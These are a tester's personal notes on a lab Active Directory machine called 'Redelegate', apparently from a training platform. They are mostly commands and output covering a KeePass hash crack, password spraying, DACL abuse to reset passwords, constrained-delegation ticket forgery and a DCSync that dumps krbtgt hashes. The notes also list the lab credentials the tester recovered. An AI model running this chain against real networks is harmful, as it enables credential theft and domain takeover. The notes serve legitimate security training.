Redelegate
This is not a writeup, just my notes about the machine.
Operating System: Windows Server 2022 Standard
Chain: False
Credentials
Username
Password
Method
Scope
Keepass
Fall2024!
Brute forcing
Payroll
cVkqz4bCM7kJRSNlgx2G
Extracted from Keepass DB
Timesheet
hMFS4I0Kj8Rcd62vqi5X
Extracted from Keepass DB
KeyFob
22331144
Extracted from Keepass DB
Administrator
Spdv41gg4BlBgSYIW1gF
Extracted from Keepass DB
FTPUser
SguPZBKdRyxWzvXRWy6U
Extracted from Keepass DB
FTP
SQLGuest
zDPBpaF4FywlqIv11vii
Extracted from Keepass DB
MSSQL
WordPress Panel
cn4KOEgsHqvKXPjEnSD9
Extracted from Keepass DB
Wordpress
marie.curie
Fall2024!
Brute forcing
Domain User
✅ Valid Usernames
ryan.cooper
marie.curie
FTPUser
WEB01
SQLGuest
Administrator🔑 Passwords list
Fall2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9Information Gathering
Nmap Scan
# Nmap 7.94SVN scan initiated Mon Apr 14 17:32:47 2025 as: nmap -sS -T5 -p- --open -A -Pn -n -oN ext_tcp_redelegate_allports -vvv 10.10.67.58
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-14 21:35:17Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49932/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
61346/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61358/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
61360/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCService Enumeration
FTP
Anonymous FTP login allowed
❯ wget -m --no-passive ftp://anonymous:anonymous@10.10.67.58
<SNIF>
2025-04-14 17:44:49 (57.4 MB/s) - ‘10.10.67.58/CyberAudit.txt’ saved [434
2025-04-14 17:44:50 (396 MB/s) - ‘10.10.67.58/Shared.kdbx’ saved [2622]
2025-04-14 17:44:50 (54.1 KB/s) - ‘10.10.67.58/TrainingAgenda.txt’ saved [580]File: CyberAudit.txt
----------------------------------
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESSFile: TrainingAgenda.txt
-----------------------------
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate themKeepass Database (Not Success with rockyou)
❯ keepass2john Shared.kdbx > keepass.hash
❯ hashcat -m 29700 keepass.hash /usr/share/wordlists/rockyou.txt DNS
Not vulnerable to DNS Zone Transfer
HTTP
IIS Default Website
Kerberos
Nomenclature name: name.lastname@redelegate.vl
❯ /opt/kerbrute/kerbrute userenum --dc 10.10.67.58 -d redelegate.vl /opt/statistically-likely-usernames/john.smith.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 04/14/25 - Ronnie Flathers @ropnop
2025/04/14 17:56:51 > Using KDC(s):
2025/04/14 17:56:51 > 10.10.67.58:88
2025/04/14 17:56:57 > [+] VALID USERNAME: ryan.cooper@redelegate.vl
2025/04/14 18:00:18 > [+] VALID USERNAME: marie.curie@redelegate.vl
2025/04/14 18:03:38 > Done! Tested 248231 usernames (2 valid) in 407.089 secondsTwo Valid User obtained: ryan.cooper & marie.curie
SMB (enum4linux-ng)
Domain SID: S-1-5-21-4024337825-2033394866-2055507597
Server allows null session
Initial Foothold
Bruteforcing Keepass database
According with TrainingAgenda.txt file found on FTP there was a hint looks like password SeasonYear!.
The tester created a file as follows:
File: possible-passwords.txt
---------------------------------
spring
summer
fall
winter
autumnThe tester created a hashcat rules file as follows:
File: custom.rule
---------------------------------
:
l
u
$2$0$2$3
$2$0$2$4
$2$0$2$5
c $2$0$2$3
c $2$0$2$4
c $2$0$2$5
$2$0$2$3 $!
$2$0$2$4 $!
$2$0$2$5 $!
c $2$0$2$3 $!
c $2$0$2$4 $!
c $2$0$2$5 $!Finally performed the mutation procedure to create the final wordlist.
❯ hashcat --force possible-passwords.txt -r custom.rule --stdout | sort -u > mut_passwords.txt❯ john keepass.hash -w=mut_passwords.txt
<SNIF>
Fall2024! (?)
<SNIF>Enumerating database
❯ kpcli --kdb=Shared.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
<SNIF>The tester was able to retrieve a list of valis credentials stored into the keepass database. (Check Passwords list)
Brute forcing domain users.
❯ nxc smb 10.10.67.58 -u users.txt -p passwords.txt --continue-on-success | grep "[+]"
SMB 10.10.67.58 445 DC [+] redelegate.vl\marie.curie:Fall2024!
❯ nxc mssql 10.10.67.58 -u users.txt -p passwords.txt --continue-on-success | grep "[+]"
MSSQL 10.10.67.58 1433 DC [+] redelegate.vl\marie.curie:Fall2024!Finding kerberoastable and asreproastable users
❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --asreproast asreproast.hashes
SMB 10.10.67.58 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP 10.10.67.58 389 DC [+] redelegate.vl\marie.curie:Fall2024!
LDAP 10.10.67.58 389 DC [*] Total of records returned 3
LDAP 10.10.67.58 389 DC No entries found!
❯ nxc ldap 10.10.67.58 -u 'marie.curie' -p 'Fall2024!' --kerberoast kerberoast.hashes
SMB 10.10.67.58 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP 10.10.67.58 389 DC [+] redelegate.vl\marie.curie:Fall2024!
LDAP 10.10.67.58 389 DC Bypassing disabled account krbtgt
LDAP 10.10.67.58 389 DC No entries found!
LDAP 10.10.67.58 389 DC [-] Error with the LDAP account usedAbusing DACL misconfiguration
Taking Over domain users
❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'James.Dinkleberg' 'Passsword123!'
[+] Password changed successfully!
❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'Guest' 'Passsword123!'
[+] Password changed successfully!Constrained Delegation
Constrained Delegation from Linux
Changing the user account password
Helen.frost is member of Remote Management Users that allowed to authenticate remotely.
❯ bloodyAD -u 'marie.curie' -p 'Fall2024!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'Helen.Frost' 'Passsword123!'
[+] Password changed successfully!Changing the computer account password
#Using BloodyAD
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 set password 'FS01$' 'Passsword123!'
[+] Password changed successfully!
#Using net RCP
❯ net rpc password "FS01$" -U "redelegate.vl"/"Helen.Frost" -S 10.10.98.61Adding TRUSTED_TO_AUTH_FOR_DELEGATION property
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 get object 'FS01$' --attr 'useraccountcontrol'Setting msDS-AllowedToDelegateTo to LDAP
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 set object 'FS01$' 'msDS-AllowedToDelegateTo' -v 'ldap/dc.redelegate.vl'
[+] FS01$'s msDS-AllowedToDelegateTo has been updated
❯ bloodyAD -u 'Helen.Frost' -p 'Passsword123!' -d redelegate.vl --dc-ip 10.10.98.61 get object 'FS01$' --attr msDS-AllowedToDelegateToRequesting TGT using S4u
❯ impacket-getST 'redelegate.vl'/'FS01$':'Passsword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccachePerforming DCSync Attack
❯ KRB5CCNAME='dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc.redelegate.vl -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
[*] Cleaning up... Constrained Delegation from Windows
Changing computer Account password
*Evil-WinRM* PS C:\Temp> Set-ADAccountPassword -Identity "FS01$" -Reset -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force) -VerboseAdding TRUSTED_TO_AUTH_FOR_DELEGATION property
*Evil-WinRM* PS C:\Temp> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
*Evil-WinRM* PS C:\Temp> Get-ADComputer FS01 -Properties TrustedToAuthForDelegationSetting msDS-AllowedToDelegateTo to LDAP
*Evil-WinRM* PS C:\Temp> Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Replace @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}
*Evil-WinRM* PS C:\Temp> Get-ADComputer FS01 -Properties msDS-AllowedToDelegateToRequesting ticket granting ticket using S4U2Self and S4U2Proxy
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> .\Rubeus.exe asktgt /user:FS01$ /password:'NewPassword123!' /nowrap
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> ./Rubeus.exe s4u /impersonateuser:dc /msdsspn:ldap/dc.redelegate.vl /ticket:<TICKET> /ptt
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> klist
Current LogonId is 0:0x79303
Cached Tickets: (1)
#0> Client: dc @ REDELEGATE.VL
Server: ldap/dc.redelegate.vl @ REDELEGATE.VL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 4/14/2025 21:42:10 (local)
End Time: 4/15/2025 7:41:56 (local)
Renew Time: 4/21/2025 21:41:56 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
Performing DCSync Attack using mimikatz (Not Working)
If someone knows why this is happend, please contact to me. I really appreciate a lot understand why this is not working as expected.
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> .\mimikatz.exe privilege::debug "lsadump::dcsync /all /patch" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /all /patch
[DC] 'redelegate.vl' will be the domain
[DC] 'dc.redelegate.vl' will be the DC server
[DC] Exporting domain 'redelegate.vl'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)
mimikatz(commandline) # exit
Bye!Performing DCSync attack using impacket toolkit
❯ impacket-getST 'redelegate.vl'/'FS01$':'NewPassword123!' -impersonate dc -spn 'ldap/dc.redelegate.vl' 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccacheLast updated